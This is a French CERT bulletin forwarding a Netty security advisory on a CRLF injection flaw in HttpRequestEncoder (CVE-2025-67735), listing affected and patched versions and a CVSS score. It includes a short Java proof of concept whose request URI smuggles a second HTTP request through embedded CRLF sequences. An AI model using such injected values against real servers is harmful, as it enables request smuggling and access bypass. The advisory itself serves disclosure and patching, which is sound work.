Ce mail provient de l'extérieur, restons vigilants

=====================================================================

                            CERT-Renater

                Note d'Information No. 2025/VULN859
_____________________________________________________________________

DATE                : 16/12/2025

HARDWARE PLATFORM(S): /

OPERATING SYSTEM(S): Systems running io.netty:netty-codec-http (maven)
                      versions prior to 4.2.8.Final, 4.1.129.Final.

=====================================================================
https://github.com/netty/netty/security/advisories/GHSA-84h7-rjj3-6jx4
_____________________________________________________________________


CRLF injection vulnerability in io.netty.handler.codec.http.HttpRequestEncoder
Moderate
normanmaurer published GHSA-84h7-rjj3-6jx4 Dec 15, 2025

Package
io.netty:netty-codec-http (Maven)

Affected versions
<= 4.2.7.Final, <= 4.1.128.Final

Patched versions
>= 4.2.8.Final, >) 4.1.129.Final


Description

Summary

The io.netty.handler.codec.http.HttpRequestEncoder CRLF injection
with the request uri when constructing a request. This leads to
request smuggling when HttpRequestEncoder is used without proper
sanitization of the uri.


Details

The HttpRequestEncoder simply UTF8 encodes the uri without
sanitization (buf.writeByte(SP).writeCharSequence(uriCharSequence, CharsetUtil.UTF_8);)

The default implementation of HTTP headers guards against such
possibility already with a validator making it impossible with
headers.


PoC

Simple reproducer:

public static void main(String[] args) {

  EmbeddedChannel client = new EmbeddedChannel();
  client.pipeline().addLast(new HttpClientCodec());

  EmbeddedChannel server = new EmbeddedChannel();
  server.pipeline().addLast(new HttpServerCodec());
  server.pipeline().addLast(new ChannelInboundHandlerAdapter() {
    @Override
    public void channelRead(ChannelHandlerContext ctx, Object msg) throws Exception {
      System.out.println("Processing msg " + msg);
    }
  });

  DefaultHttpRequest request = new DefaultHttpRequest(
    HttpVersion.HTTP_1_1,
    HttpMethod.GET,
    "/s1 HTTP/1.1\r\n" +
      "\r\n" +
      "POST /s2 HTTP/1.1\r\n" +
      "content-length: 11\r\n\r\n" +
      "Hello World" +
      "GET /s1"
  );
  client.writeAndFlush(request);
  ByteBuf tmp;
  while ((tmp = client.readOutbound()) != null) {
    server.writeInbound(tmp);
  }
}

Impact

Any application / framework using HttpRequestEncoder can be subject
to be abused to perform request smuggling using CRLF injection.


Contribution

I am available to discuss and contribute fixes.


Severity
Moderate
6.5/ 10

CVSS v3 base metrics
Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
Low
Integrity
Low
Availability
None
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

CVE ID
CVE-2025-67735

Weaknesses
Weakness CWE-93

Credits

    @vietj vietj Coordinator
    @nakyamad nakyamad Reporter


=========================================================
+ CERT-RENATER        |    tel : 01-53-94-20-44         +
+ 23/25 Rue Daviel    |    fax : 01-53-94-20-41         +
+ 75013 Paris         |   email:cert@support.renater.fr +
=========================================================